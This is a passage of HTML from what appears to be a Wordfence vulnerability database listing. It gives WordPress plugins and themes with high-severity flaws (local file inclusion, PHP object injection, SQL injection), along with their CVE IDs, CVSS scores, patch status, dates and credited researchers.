						<a href="https://www.cve.org/CVERecord?id=CVE-2026-78478" target="_blank" rel="noopener noreferrer">							CVE-2026-78478						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 20, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-themes/mane" target="_blank" rel="noopener">Mane</a> <span class="wfvr-software-slug">[mane]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/tran-nguyen-bao-khanh-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/tran-nguyen-bao-khanh-2" target="_blank" rel="noopener">Tran Nguyen Bao Khanh</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a71e330e-8673-49b4-8c31-63771533476f" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/66e46f9f-d4f1-4fde-8aa5-a9a9c216ae04" target="_blank" rel="noopener">RegistrationMagic – Custom Registration Forms, User Registration, Payment, and User Login &lt;= 6.0.9.7 &#8211; Unauthenticated PHP Object Injection</a></h4>
<div class="cvss-score-badge">8.1</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>8.1 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-73341" target="_blank" rel="noopener noreferrer">							CVE-2026-73341						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/custom-registration-form-builder-with-submission-manager" target="_blank" rel="noopener">RegistrationMagic – Custom Registration Forms, User Registration, Payment, and User Login</a> <span class="wfvr-software-slug">[custom-registration-form-builder-with-submission-manager]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/dutafi" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/4e130f207b6dc84614b81d6d7fd4b475.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4e130f207b6dc84614b81d6d7fd4b475"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/dutafi" target="_blank" rel="noopener">dutafi</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/66e46f9f-d4f1-4fde-8aa5-a9a9c216ae04" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/ced01ad6-01a9-401c-baf1-25af6840a374" target="_blank" rel="noopener">Resido &#8211; Real Estate WordPress Theme &lt;= 1.5 &#8211; Unauthenticated Local File Inclusion</a></h4>
<div class="cvss-score-badge">8.1</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>8.1 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-73387" target="_blank" rel="noopener noreferrer">							CVE-2026-73387						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 19, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-themes/resido" target="_blank" rel="noopener">Resido &#8211; Real Estate WordPress Theme</a> <span class="wfvr-software-slug">[resido]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/joao-pedro-s-alcantara" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/d2778a23819a9ce528ff412cf1f5e72c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="d2778a23819a9ce528ff412cf1f5e72c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/joao-pedro-s-alcantara" target="_blank" rel="noopener">João Pedro S Alcântara</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/ced01ad6-01a9-401c-baf1-25af6840a374" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/ed2d9922-6e43-49ac-8981-1bc3a23e88ac" target="_blank" rel="noopener">Restaurant Menu and Food Ordering &lt;= 2.4.11 &#8211; Unauthenticated Local File Inclusion</a></h4>
<div class="cvss-score-badge">8.1</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>8.1 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-73400" target="_blank" rel="noopener noreferrer">							CVE-2026-73400						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/mp-restaurant-menu" target="_blank" rel="noopener">Restaurant Menu and Food Ordering</a> <span class="wfvr-software-slug">[mp-restaurant-menu]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jakub-herman" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/d36a048c5f4fe8795a861da6334611fa.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="d36a048c5f4fe8795a861da6334611fa"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jakub-herman" target="_blank" rel="noopener">Jakub Herman</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/ed2d9922-6e43-49ac-8981-1bc3a23e88ac" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/e154cb8e-db3c-4d08-a3ad-c72e7733cfce" target="_blank" rel="noopener">Shuffle &lt;= 1.8 &#8211; Unauthenticated Local File Inclusion</a></h4>
<div class="cvss-score-badge">8.1</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>8.1 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-78566" target="_blank" rel="noopener noreferrer">							CVE-2026-78566						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 19, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-themes/shuffle" target="_blank" rel="noopener">Shuffle</a> <span class="wfvr-software-slug">[shuffle]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/bonds" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/bonds" target="_blank" rel="noopener">Bonds</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/e154cb8e-db3c-4d08-a3ad-c72e7733cfce" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/e43df95c-761a-460c-a3ac-da60383b067d" target="_blank" rel="noopener">Smart Popup by Supsystic &lt;= 1.13.0 &#8211; Unauthenticated PHP Object Injection</a></h4>
<div class="cvss-score-badge">8.1</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>8.1 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-73380" target="_blank" rel="noopener noreferrer">							CVE-2026-73380						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/popup-by-supsystic" target="_blank" rel="noopener">Smart Popup by Supsystic</a> <span class="wfvr-software-slug">[popup-by-supsystic]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/asim-alshaya" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/f1f186a43626c61a7e05b5db4a89b87d.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="f1f186a43626c61a7e05b5db4a89b87d"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/asim-alshaya" target="_blank" rel="noopener">Asim Alshaya</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/e43df95c-761a-460c-a3ac-da60383b067d" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/d58fd738-44a5-4f92-b9de-8213fc4d2db0" target="_blank" rel="noopener">Tonda &#8211; Elegant Shop WordPress Theme &lt; 2.6 &#8211; Unauthenticated Local File Inclusion</a></h4>
<div class="cvss-score-badge">8.1</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>8.1 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-28151" target="_blank" rel="noopener noreferrer">							CVE-2026-28151						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 20, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-themes/tonda" target="_blank" rel="noopener">Tonda &#8211; Elegant Shop WordPress Theme</a> <span class="wfvr-software-slug">[tonda]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/tran-nguyen-bao-khanh-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/tran-nguyen-bao-khanh-2" target="_blank" rel="noopener">Tran Nguyen Bao Khanh</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/d58fd738-44a5-4f92-b9de-8213fc4d2db0" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/2b8b6580-1886-4b50-a782-1bde703b37b0" target="_blank" rel="noopener">Tonda Core &lt; 2.6 &#8211; Unauthenticated Local File Inclusion</a></h4>
<div class="cvss-score-badge">8.1</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>8.1 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-28152" target="_blank" rel="noopener noreferrer">							CVE-2026-28152						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 20, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/tonda-core" target="_blank" rel="noopener">Tonda Core</a> <span class="wfvr-software-slug">[tonda-core]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/tran-nguyen-bao-khanh-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/tran-nguyen-bao-khanh-2" target="_blank" rel="noopener">Tran Nguyen Bao Khanh</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/2b8b6580-1886-4b50-a782-1bde703b37b0" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/4d59932d-8f22-430b-a2be-792ffb2947ee" target="_blank" rel="noopener">Ultimate Maps by Supsystic &lt; 1.5.0 &#8211; Unauthenticated PHP Object Injection</a></h4>
<div class="cvss-score-badge">8.1</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>8.1 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-73376" target="_blank" rel="noopener noreferrer">							CVE-2026-73376						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ultimate-maps-by-supsystic" target="_blank" rel="noopener">Ultimate Maps by Supsystic</a> <span class="wfvr-software-slug">[ultimate-maps-by-supsystic]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/asim-alshaya" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/f1f186a43626c61a7e05b5db4a89b87d.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="f1f186a43626c61a7e05b5db4a89b87d"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/asim-alshaya" target="_blank" rel="noopener">Asim Alshaya</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/4d59932d-8f22-430b-a2be-792ffb2947ee" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/92abc078-4fdd-4afe-aa46-cdd3a18161f4" target="_blank" rel="noopener">Verdure Core &lt;= 1.2 &#8211; Unauthenticated Local File Inclusion</a></h4>
<div class="cvss-score-badge">8.1</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>8.1 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-78562" target="_blank" rel="noopener noreferrer">							CVE-2026-78562						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 20, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/verdure-core" target="_blank" rel="noopener">Verdure Core</a> <span class="wfvr-software-slug">[verdure-core]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/tran-nguyen-bao-khanh-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/tran-nguyen-bao-khanh-2" target="_blank" rel="noopener">Tran Nguyen Bao Khanh</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/92abc078-4fdd-4afe-aa46-cdd3a18161f4" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/929152b6-d7eb-4a81-a1cc-453cf17c6e25" target="_blank" rel="noopener">WP Cafe Pro  &lt;= 3.0.14 &#8211; Unauthenticated Local File Inclusion</a></h4>
<div class="cvss-score-badge">8.1</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>8.1 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-66587" target="_blank" rel="noopener noreferrer">							CVE-2026-66587						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 20, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/UNKNOWN-CVE-2026-66586" target="_blank" rel="noopener">WP Cafe Pro</a> <span class="wfvr-software-slug">[wpcafe-pro]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/929152b6-d7eb-4a81-a1cc-453cf17c6e25" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/7bbae2db-3b69-47ac-8fe9-934d6ecbaa63" target="_blank" rel="noopener">Youzify – BuddyPress Community, User Profile, Social Network &amp; Membership Plugin for WordPress &lt;= 1.3.7 &#8211; Unauthenticated PHP Object Injection</a></h4>
<div class="cvss-score-badge">8.1</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>8.1 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-73397" target="_blank" rel="noopener noreferrer">							CVE-2026-73397						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/youzify" target="_blank" rel="noopener">Youzify – BuddyPress Community, User Profile, Social Network &amp; Membership Plugin for WordPress</a> <span class="wfvr-software-slug">[youzify]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/spek" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/258c774aecd81b7d1fa67abf3b576b33.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="258c774aecd81b7d1fa67abf3b576b33"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/spek" target="_blank" rel="noopener">Peter Thaleikis</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/7bbae2db-3b69-47ac-8fe9-934d6ecbaa63" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/5d9c1c3d-6882-4425-8d32-bdb57b4f133d" target="_blank" rel="noopener">Advanced Product Fields (Product Addons) for WooCommerce &lt;= 1.6.21 &#8211; Unauthenticated Improper Input Validation to Price Bypass via Add-to-Cart POST Request</a></h4>
<div class="cvss-score-badge">7.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.5 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-2996" target="_blank" rel="noopener noreferrer">							CVE-2026-2996						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 21, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/advanced-product-fields-for-woocommerce" target="_blank" rel="noopener">Advanced Product Fields (Product Addons) for WooCommerce</a> <span class="wfvr-software-slug">[advanced-product-fields-for-woocommerce]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/andres-cruciani" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/f01d5fec6ebed3f801cac3e2e05ec591.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="f01d5fec6ebed3f801cac3e2e05ec591"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/andres-cruciani" target="_blank" rel="noopener">Andrés Cruciani</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/5d9c1c3d-6882-4425-8d32-bdb57b4f133d" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/74af51ee-c168-4f1b-8c6b-659ad6d148de" target="_blank" rel="noopener">Affiliates Manager &lt;= 2.9.53 &#8211; Unauthenticated SQL Injection</a></h4>
<div class="cvss-score-badge">7.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.5 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-73355" target="_blank" rel="noopener noreferrer">							CVE-2026-73355						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/affiliates-manager" target="_blank" rel="noopener">Affiliates Manager</a> <span class="wfvr-software-slug">[affiliates-manager]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/20kilograma" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/355ce104d8d84334b00aeb894b98d99d.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="355ce104d8d84334b00aeb894b98d99d"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/20kilograma" target="_blank" rel="noopener">20kilograma</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/74af51ee-c168-4f1b-8c6b-659ad6d148de" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/2f6b3518-1eb0-4cd9-9d5d-4a5a81c90c7f" target="_blank" rel="noopener">BookingPress Appointment Booking Pro &lt;= 6.0.6 &#8211; Unauthenticated SQL Injection</a></h4>
<div class="cvss-score-badge">7.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.5 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-68566" target="_blank" rel="noopener noreferrer">							CVE-2026-68566						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
